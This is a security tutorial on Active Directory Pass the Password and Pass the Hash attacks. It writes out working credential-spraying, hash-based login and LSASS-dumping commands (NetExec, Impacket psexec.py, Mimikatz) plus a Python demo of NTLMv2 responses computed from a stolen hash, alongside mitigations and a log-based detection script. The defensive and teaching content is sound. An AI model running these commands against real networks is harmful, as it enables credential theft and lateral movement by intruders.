Attacks - Active Directory Hacking

Pass the Password / Pass the Hash

Overview

Pass the Password (PtP) and Pass the Hash (PtH) are techniques attackers use to move laterally through a network with stolen credentials: a plaintext password in the first case, a password hash in the second. PtP works against any service that accepts a password. PtH abuses a property of Windows NTLM authentication: the challenge-response is keyed by the NT hash of the password rather than by the password itself, so the hash alone is a usable credential and never needs to be cracked.

Pass the Password (PtP)

What is Pass the Password?

Pass the Password is a technique where an attacker uses a stolen plaintext password to authenticate as the victim user across the network.

How it Works

  1. Attacker obtains valid credentials (username and plaintext password), for example from a phishing page, a credential file, a cracked hash or LSASS memory on a host where the password was cached in clear text
  2. Uses these credentials to authenticate to other systems over SMB, WMI, WinRM or RDP
  3. Gains access to every resource the compromised user is authorized for: file shares, and code execution on any host where the account is a local administrator

Tools for PtP

  • NetExec
  • Impacket tools (psexec.py, wmiexec.py)
  • RDP clients
  • PowerShell remoting

Example Attack

Using CrackMapExec (NetExec, its maintained successor, takes the same arguments as nxc)

crackmapexec smb 192.168.1.0/24 -u username -p password

Add -d DOMAIN for a domain account or --local-auth for a local one. Every host that accepts the login is listed; those where the account is a local administrator are marked (Pwn3d!).

Using Impacket's psexec

psexec.py domain/username:password@target

psexec.py uploads a service binary to the ADMIN$ share and registers a service, so it needs local administrator rights on the target and leaves a service-installation event behind; wmiexec.py achieves the same with WMI and no service creation, which is quieter.

Pass the Hash (PtH)

What is Pass the Hash?

Pass the Hash is an attack that allows an attacker to authenticate to a remote system using the underlying NTLM hash of a user’s password without knowing the actual password.

How it Works

  1. Attacker obtains the NT hash (commonly called the NTLM hash) of the target account
  2. Instead of cracking the hash, hands it directly to the authentication library in place of the password
  3. This works because the NTLM challenge-response is computed from the NT hash; the protocol never needs the plaintext. The same hash is also the RC4 Kerberos key, so it can be used to request a TGT (overpass-the-hash), which is what Mimikatz's sekurlsa::pth does
  4. Allows lateral movement without knowledge of the password

Caveat: for local (non-domain) accounts, UAC remote restrictions mean that by default only the built-in RID 500 Administrator receives a full administrative token over the network; other local administrators only get PtH working if LocalAccountTokenFilterPolicy is set to 1 on the target.
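
The following is an added example, not code from the article or from any of the tools it names. It shows step 3 concretely: it computes the NT hash (MD4 over the UTF-16LE password) and an NTLMv2 challenge-response as specified in MS-NLMP, once from the password and once from a hash an attacker might have dumped, and checks that the two answers are identical. The MD4 routine is included in pure Python because hashlib's md4 is unavailable on many modern OpenSSL builds; the server challenge, client challenge, timestamp and empty target-info block are constructed values, not captured ones.

```python
"""Why an NT hash is enough for NTLM authentication (added example, not tool code).

The NTLMv2 challenge-response is keyed by MD4(UTF-16LE(password)), so a stolen
hash reproduces the legitimate client's answer exactly.  Challenge, timestamp and
target-info values below are constructed, not captured.
"""
import hashlib
import hmac
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); the NT hash is defined as MD4 and hashlib
    often lacks it, so it is implemented here."""

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    rounds = (
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = _rotl((a + func(b, c, d) + x[k] + const) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c          # rotate registers: next step updates old D
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password, i.e. the value dumped from LSASS or the SAM."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(nthash: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 key: HMAC-MD5 keyed by the NT hash over UPPER(user) + domain (MS-NLMP 3.3.2)."""
    return hmac.new(nthash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(nthash: bytes, user: str, domain: str, server_challenge: bytes,
                    client_challenge: bytes, timestamp: int,
                    target_info: bytes = b"\x00\x00\x00\x00") -> tuple[bytes, bytes]:
    """Return (NtChallengeResponse, SessionBaseKey). Only the NT hash enters the
    computation; the plaintext password never does."""
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    key = ntowf_v2(nthash, user, domain)
    nt_proof = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    session_base_key = hmac.new(key, nt_proof, hashlib.md5).digest()
    return nt_proof + temp, session_base_key


def pth_matches_legitimate_client() -> bool:
    """Constructed scenario: the real client knows the password, the attacker only the
    dumped hash. Both produce the identical NTLMv2 response to the same challenge."""
    server_challenge = bytes.fromhex("0123456789abcdef")   # constructed
    client_challenge = bytes.fromhex("ffeeddccbbaa9988")   # constructed
    timestamp = 0x01DA9C0000000000                          # constructed FILETIME
    legit, _ = ntlmv2_response(nt_hash("password"), "alice", "CORP",
                               server_challenge, client_challenge, timestamp)
    stolen = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")  # NT hash of "password"
    forged, _ = ntlmv2_response(stolen, "alice", "CORP",
                                server_challenge, client_challenge, timestamp)
    return legit == forged


if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("PtH response identical to legitimate client:", pth_matches_legitimate_client())
```

The target-info block is left at a bare MsvAvEOL terminator for brevity; real clients copy the server's AV pairs into it, which is what enables channel binding and target-name checks, but that does not change the conclusion: whoever holds the NT hash can answer any challenge.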

Common Ways to Obtain Hashes

  1. Dumping LSASS memory on a host where the user has logged on (Mimikatz sekurlsa::logonpasswords, or a minidump of lsass.exe parsed offline)
  2. Extracting the local SAM database, which also needs the SYSTEM hive for the boot key (Mimikatz lsadump::sam, or Impacket's secretsdump.py)
  3. DCSync attack: an account with directory replication rights asks a domain controller to replicate password data (Mimikatz lsadump::dcsync, or secretsdump.py against the DC)
  4. Saved registry hives (reg save of HKLM\SAM, HKLM\SYSTEM and HKLM\SECURITY), parsed offline
  5. A copy of NTDS.dit taken from a domain controller, for example through a volume shadow copy

Tools for PtH

  • Mimikatz
  • Impacket suite
  • NetExec
  • Evil-WinRM
  • Metasploit

Example Attack

Using Mimikatz

sekurlsa::logonpasswords
sekurlsa::pth /user:administrator /domain:target.local /ntlm:hash

Both commands need privilege::debug (or a SYSTEM context) first, because they read LSASS. sekurlsa::logonpasswords lists the NT hashes of every logged-on account; sekurlsa::pth starts a new process (cmd.exe unless /run: is given) in a fresh logon session whose outbound network authentications use the supplied hash, so any tool launched from that window authenticates as the victim without the password.

Using NetExec

nxc smb 192.168.1.0/24 -u username -H HASH

This connects to every host in the range that exposes SMB and attempts NTLM authentication with the supplied NT hash; hosts where the account is a local administrator are marked (Pwn3d!). Add -d DOMAIN for a domain account or --local-auth for a local one.

Using psexec.py

psexec.py domain/username@target -hashes :hash

The -hashes argument takes LMHASH:NTHASH; the leading colon leaves the LM half empty, which is the normal case on any modern system. The same flag works across the Impacket suite (wmiexec.py, smbexec.py, secretsdump.py).

Mitigation

Key Strategies

  1. Credential Protection

    • Do not reuse one local administrator password across machines; deploy LAPS so every host has a unique, rotated one, which turns a hash stolen from one workstation into a credential for that workstation only
    • Use long passwords or passphrases (this defeats cracking, not PtH itself, which needs no cracking)
    • Disable the Guest account; disable or rename the built-in Administrator (RID 500), the one local account exempt from UAC remote restrictions
    • Place domain administrators in the Protected Users group, which blocks NTLM for them and stops their credentials being cached
  2. Network Security

    • Network segmentation: block SMB, WinRM and RDP between workstations, and allow administrative protocols only from dedicated admin workstations
    • Enable SMB signing; note that this defeats NTLM relay, a related attack, but does not stop PtH with a valid hash
    • Audit and then restrict NTLM with the "Network security: Restrict NTLM" policies so that Kerberos is the only accepted protocol wherever possible
    • Implement MFA for remote access gateways; internal NTLM and SMB logons are not MFA-gated, so MFA reduces the initial foothold rather than the lateral movement
  3. System Hardening

    • Restrict admin accounts: tiered administration, and "Deny access to this computer from the network" for local accounts and for tier-0 accounts on lower-tier hosts
    • Regular updates
    • Enable Credential Guard and LSA Protection (RunAsPPL) so that LSASS does not hand reusable hashes to user-mode tools

Monitoring

  • Monitor privileged accounts: alert on Event ID 4672 (special privileges assigned) on hosts where those accounts should never log on
  • Log and correlate the events that PtH leaves behind: 4624 with Logon Type 3, Authentication Package NTLM and Logon Process NtLmSsp from one source address to many hosts in a short window; 4624 with Logon Type 9 and Logon Process seclogo on the source host (produced by sekurlsa::pth and also by runas /netonly, so triage rather than block on it); 4776 on domain controllers for NTLM credential validation; 4648 for explicit-credential logons; System log 7045 for the service psexec-style tools install
  • Deploy EDR solutions that alert on handles opened to lsass.exe by non-system processes and on remote service creation
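
As an added example (not from the article or any vendor product), the two rules below turn the event patterns above into code: a NewCredentials (type 9) logon created through seclogo on the source host, and one account plus source address completing NTLM network logons on several distinct hosts within a few minutes. The events are constructed to mirror the fields of Event ID 4624; they are not real captures, and the thresholds are illustrative.

```python
"""Detection sketch for PtH-style lateral movement over Windows Security events.

Added example, not from the article or any product. The events are constructed
to look like 4624 records (field names follow the Security log); they are not
real captures.
"""
from collections import defaultdict
from datetime import datetime, timedelta


def _ev(ts, computer, logon_type, auth_pkg, logon_proc, user, ip):
    return {"EventID": 4624, "TimeCreated": ts, "Computer": computer, "LogonType": logon_type,
            "AuthenticationPackageName": auth_pkg, "LogonProcessName": logon_proc,
            "TargetUserName": user, "IpAddress": ip}


# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    _ev("2024-05-01T09:00:01", "FS01", 3, "Kerberos", "Kerberos", "alice", "10.0.0.5"),       # normal
    _ev("2024-05-01T09:04:40", "WS07", 9, "Negotiate", "seclogo", "administrator", "::1"),    # pth / netonly
    _ev("2024-05-01T09:05:00", "FS01", 3, "NTLM", "NtLmSsp", "administrator", "10.0.0.77"),   # sweep begins
    _ev("2024-05-01T09:05:03", "DB02", 3, "NTLM", "NtLmSsp", "administrator", "10.0.0.77"),
    _ev("2024-05-01T09:05:07", "APP03", 3, "NTLM", "NtLmSsp", "administrator", "10.0.0.77"),
    _ev("2024-05-01T09:05:12", "DC01", 3, "NTLM", "NtLmSsp", "administrator", "10.0.0.77"),
    _ev("2024-05-01T09:10:00", "FS01", 3, "NTLM", "NtLmSsp", "svc_backup", "10.0.0.20"),     # one host, benign
]


def find_newcredentials_logons(events):
    """Rule 1: explicit-credential logons created via seclogo (runas /netonly, sekurlsa::pth).
    Legitimate admins use runas /netonly too, so hits are leads to triage, not verdicts."""
    return [e for e in events
            if e["EventID"] == 4624 and e["LogonType"] == 9
            and e["LogonProcessName"].lower() == "seclogo"]


def find_ntlm_fanout(events, min_hosts=3, window=timedelta(minutes=5)):
    """Rule 2: the same account and source IP reaching >= min_hosts distinct computers
    over NTLM within `window`. Returns one finding per (user, ip) pair."""
    by_key = defaultdict(list)
    for e in events:
        if (e["EventID"] == 4624 and e["LogonType"] == 3
                and e["AuthenticationPackageName"].upper() == "NTLM"):
            by_key[(e["TargetUserName"].lower(), e["IpAddress"])].append(e)

    findings = []
    for (user, ip), evs in by_key.items():
        evs.sort(key=lambda e: datetime.fromisoformat(e["TimeCreated"]))
        for i, first in enumerate(evs):            # sliding window anchored at each event
            t0 = datetime.fromisoformat(first["TimeCreated"])
            hosts = {e["Computer"] for e in evs[i:]
                     if datetime.fromisoformat(e["TimeCreated"]) - t0 <= window}
            if len(hosts) >= min_hosts:
                findings.append({"user": user, "source_ip": ip, "hosts": sorted(hosts),
                                 "first_seen": first["TimeCreated"]})
                break
    return findings


if __name__ == "__main__":
    for hit in find_newcredentials_logons(SAMPLE_EVENTS):
        print("NewCredentials/seclogo logon:", hit["Computer"], hit["TargetUserName"])
    for hit in find_ntlm_fanout(SAMPLE_EVENTS):
        print("NTLM fan-out:", hit)
```

In production the 4624 records come from each server's Security log (or 4776 from the domain controllers, which sees all NTLM validations in one place), and the fan-out threshold should be tuned against baseline traffic from management hosts, which legitimately authenticate to many machines.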

Best Practices

  • Regular security training
  • Incident response planning
  • Access control reviews
  • Use Microsoft Defender for Identity

Conclusion

Pass the Password and Pass the Hash attacks remain significant threats in Active Directory environments. Understanding these attacks, implementing proper detection mechanisms, and maintaining strong security practices are crucial for protecting against these attack vectors. Regular security assessments and staying updated with the latest security measures help organizations maintain a robust security posture against such threats.